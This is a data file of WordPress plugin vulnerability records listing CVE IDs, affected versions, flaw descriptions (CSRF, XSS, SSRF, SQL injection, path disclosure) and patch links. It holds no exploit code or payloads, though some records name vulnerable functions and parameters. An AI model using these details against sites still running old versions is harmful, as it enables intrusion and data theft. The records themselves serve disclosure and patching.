{"CVE_ID":"CVE-2023-5776","slug":"post-meta-data-manager","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the pmdm_wp_ajax_delete_meta, pmdm_wp_delete_user_meta, and pmdm_wp_delete_user_meta functions. This makes it possible for unauthenticated attackers to delete arbitrary user, term, and post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d49b8c44-4dad-4990-a8a8-116b424a7dfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d49b8c44-4dad-4990-a8a8-116b424a7dfa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/post-meta-data-manager\\\/tags\\\/1.2.1\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/post-meta-data-manager\\\/tags\\\/1.2.1\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2981559%40post-meta-data-manager&new=2981559%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2981559%40post-meta-data-manager&new=2981559%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2994271%40post-meta-data-manager&new=2994271%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2994271%40post-meta-data-manager&new=2994271%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0059","slug":"youzify","versionEndExcluding":"1.2.2","description":"The Youzify WordPress plugin before 1.2.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e26c485-9a5a-44a3-95b3-6c063a1c321c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e26c485-9a5a-44a3-95b3-6c063a1c321c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12516","slug":"coupon-lite","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Coupon Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Coupon Code' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215992%40coupon-lite&new=3215992%40coupon-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215992%40coupon-lite&new=3215992%40coupon-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c0459-1328-4fb1-b044-ae80298fa5ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c0459-1328-4fb1-b044-ae80298fa5ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4789","slug":"wpzoom-portfolio","versionEndExcluding":"1.2.2","description":"The WPZOOM Portfolio WordPress plugin before 1.2.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e816e9a-84e5-42d2-a7ff-e46be9072278\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e816e9a-84e5-42d2-a7ff-e46be9072278\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8476","slug":"easy-paypal-events-tickets","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Easy PayPal Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation on the wpeevent_plugin_buttons() function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602d337e-0778-4182-8e77-0eb3b37d5a7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602d337e-0778-4182-8e77-0eb3b37d5a7a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155809\\\/easy-paypal-events-tickets\\\/trunk\\\/includes\\\/private_buttons.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155809\\\/easy-paypal-events-tickets\\\/trunk\\\/includes\\\/private_buttons.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6527","slug":"email-subscribe","versionImpact":"1.2.18","versionEndExcluding":"1.2.19","description":"The Email Subscription Popup plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the HTTP_REFERER header in all versions up to, and including, 1.2.18 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f84814e-f7b7-4228-b331-63027a0770af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f84814e-f7b7-4228-b331-63027a0770af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.19\\\/wp-email-subscription.php?rev=3005188#L2125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.19\\\/wp-email-subscription.php?rev=3005188#L2125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-24413","slug":"wp-vertical-image-slider","versionEndExcluding":"1.2.17","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution WordPress vertical image slider plugin <=\u00a01.2.16 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-vertical-image-slider\\\/wordpress-wordpress-vertical-image-slider-plugin-plugin-1-2-16-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-vertical-image-slider\\\/wordpress-wordpress-vertical-image-slider-plugin-plugin-1-2-16-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6560","slug":"addonify-quick-view","versionImpact":"1.2.16","versionEndExcluding":"1.2.17","description":"The Addonify \u2013 Quick View For WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2.16. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38eaab5-157c-43fa-ad67-6f063274ba69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38eaab5-157c-43fa-ad67-6f063274ba69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addonify-quick-view\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addonify-quick-view\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121821%40addonify-quick-view&new=3121821%40addonify-quick-view&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121821%40addonify-quick-view&new=3121821%40addonify-quick-view&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4467","slug":"search-filter","versionEndExcluding":"1.2.16","description":"The Search & Filter WordPress plugin before 1.2.16 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54168861-c0b8-4de6-a9af-0ad5c20b4a45\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54168861-c0b8-4de6-a9af-0ad5c20b4a45\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6732","slug":"ultimate-maps-by-supsystic","versionImpact":"1.2.15","versionEndExcluding":"1.2.16","description":"The Ultimate Maps by Supsystic WordPress plugin before 1.2.16 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 1.2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf91707-f03b-4f25-bca9-9fac4945002a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf91707-f03b-4f25-bca9-9fac4945002a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1862","slug":"woocommerce-add-to-cart-custom-redirect","versionImpact":"1.2.13","versionEndExcluding":"1.2.14","description":"The WooCommerce Add to Cart Custom Redirect plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wcr_dismiss_admin_notice' function in all versions up to, and including, 1.2.13. This makes it possible for authenticated attackers, with contributor access and above, to update the values of arbitrary site options to 'dismissed'.","recommendation":"Update to version 1.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13\\\/woocommerce-custom-redirect.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13\\\/woocommerce-custom-redirect.php#L204\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13&old=3047408&new_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.14&new=3047408&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13&old=3047408&new_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.14&new=3047408&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11276","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.136","versionEndExcluding":"1.2.137","description":"The PDF Builder for WooCommerce. Create invoices,packing slips and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.2.136 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.137, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202588%40woo-pdf-invoice-builder&new=3202588%40woo-pdf-invoice-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202588%40woo-pdf-invoice-builder&new=3202588%40woo-pdf-invoice-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9214","slug":"additional-product-fields-for-woocommerce","versionImpact":"1.2.133","versionEndExcluding":"1.2.134","description":"The Extra Product Options Builder for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'RednaoSerializedFields' parameter during the creation of a signature file in all versions up to, and including, 1.2.133 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.134, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09890f42-b9ee-4812-8cf2-f638ba9fb20f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09890f42-b9ee-4812-8cf2-f638ba9fb20f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/core\\\/Managers\\\/FileManager\\\/FileManager.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/core\\\/Managers\\\/FileManager\\\/FileManager.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173169\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173169\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3958","slug":"wp-remote-users-sync","versionEndExcluding":"1.2.13","description":"The WP Remote Users Sync plugin for WordPress is vulnerable to Server Side Request Forgery via the 'notify_ping_remote' AJAX function in versions up to, and including, 1.2.12. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This was partially patched in version 1.2.12 and fully patched in version 1.2.13.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2953845\\\/wp-remote-users-sync#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2953845\\\/wp-remote-users-sync#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/api\\\/class-wprus-api-abstract.php#L674\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/api\\\/class-wprus-api-abstract.php#L674\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file127\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e78c759-4a54-4ee4-8eff-df91fe9dad46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e78c759-4a54-4ee4-8eff-df91fe9dad46?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10116","slug":"favicon-by-realfavicongenerator","versionEndExcluding":"1.2.13","description":"A vulnerability classified as problematic has been found in RealFaviconGenerator Favicon Plugin up to 1.2.12 on WordPress. This affects the function install_new_favicon of the file admin\/class-favicon-by-realfavicongenerator-admin.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.2.13 is able to address this issue. The identifier of the patch is 949a1ae7216216350458844f50a72f100b56d4e7. It is recommended to upgrade the affected component. The identifier VDB-230661 was assigned to this vulnerability.","recommendation":"Update to version 1.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230661\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230661\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/favicon-by-realfavicongenerator\\\/commit\\\/949a1ae7216216350458844f50a72f100b56d4e7\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/favicon-by-realfavicongenerator\\\/commit\\\/949a1ae7216216350458844f50a72f100b56d4e7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230661\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230661\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6477","slug":"userswp","versionImpact":"1.2.11","versionEndExcluding":"1.2.12","description":"The UsersWP  WordPress plugin before 1.2.12 uses predictable filenames when an admin generates an export, which could allow unauthenticated attackers to download them and retrieve sensitive information such as IP, username, and email address","recommendation":"Update to version 1.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/346c855a-4d42-4a87-aac9-e5bfc2242b16\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/346c855a-4d42-4a87-aac9-e5bfc2242b16\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10777","slug":"anywhere-elementor","versionImpact":"1.2.11","versionEndExcluding":"1.2.12","description":"The AnyWhere Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.11 via the 'INSERT_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198665%40anywhere-elementor&new=3198665%40anywhere-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198665%40anywhere-elementor&new=3198665%40anywhere-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2138634-c149-4fd1-a33d-351bbf633ea3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2138634-c149-4fd1-a33d-351bbf633ea3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7414","slug":"pdf-builder-for-wpforms","versionImpact":"1.2.116","versionEndExcluding":"1.2.117","description":"The PDF Builder for WPForms plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2.116. This is due to the plugin allowing direct access to the composer-setup.php file which has display_errors on.  This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.117, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a82837-f8da-44bf-81f6-af0d9c9a6e4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a82837-f8da-44bf-81f6-af0d9c9a6e4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3132289%40pdf-builder-for-wpforms&new=3132289%40pdf-builder-for-wpforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3132289%40pdf-builder-for-wpforms&new=3132289%40pdf-builder-for-wpforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-builder-for-wpforms\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php?rev=3009060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-builder-for-wpforms\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php?rev=3009060\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6265","slug":"userswp","versionImpact":"1.2.10","versionEndExcluding":"1.2.11","description":"The UsersWP \u2013 Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018uwp_sort_by\u2019 parameter in all versions up to, and including, 1.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37fd0582-5baf-4ced-a798-dc0970e90a3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37fd0582-5baf-4ced-a798-dc0970e90a3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userswp\\\/tags\\\/1.2.10\\\/admin\\\/settings\\\/class-uwp-settings-user-sorting.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userswp\\\/tags\\\/1.2.10\\\/admin\\\/settings\\\/class-uwp-settings-user-sorting.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106884\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106884\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4039","slug":"woo-orders-tracking","versionImpact":"1.2.10","versionEndExcluding":"1.2.11","description":"The The Orders Tracking for WooCommerce plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.10. This is due to the plugin allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. A partial patch was released in 1.2.10, and a complete patch was released in 1.2.11.","recommendation":"Update to version 1.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/991ab188-869c-4875-80f3-940000a1717b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/991ab188-869c-4875-80f3-940000a1717b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-orders-tracking\\\/trunk\\\/includes\\\/frontend\\\/frontend.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-orders-tracking\\\/trunk\\\/includes\\\/frontend\\\/frontend.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083652%40woo-orders-tracking&new=3083652%40woo-orders-tracking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083652%40woo-orders-tracking&new=3083652%40woo-orders-tracking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1689","slug":"woo-tools","versionImpact":"1.2.9","versionEndExcluding":"1.2.10","description":"The WooCommerce Tools plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the woocommerce_tool_toggle_module() function in all versions up to, and including, 1.2.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to deactivate arbitrary plugin modules.","recommendation":"Update to version 1.2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3830c901-be36-4c4b-976b-d388b6af0c67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3830c901-be36-4c4b-976b-d388b6af0c67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-tools\\\/trunk\\\/admin\\\/admin-init.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-tools\\\/trunk\\\/admin\\\/admin-init.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098165%40woo-tools&new=3098165%40woo-tools&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098165%40woo-tools&new=3098165%40woo-tools&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
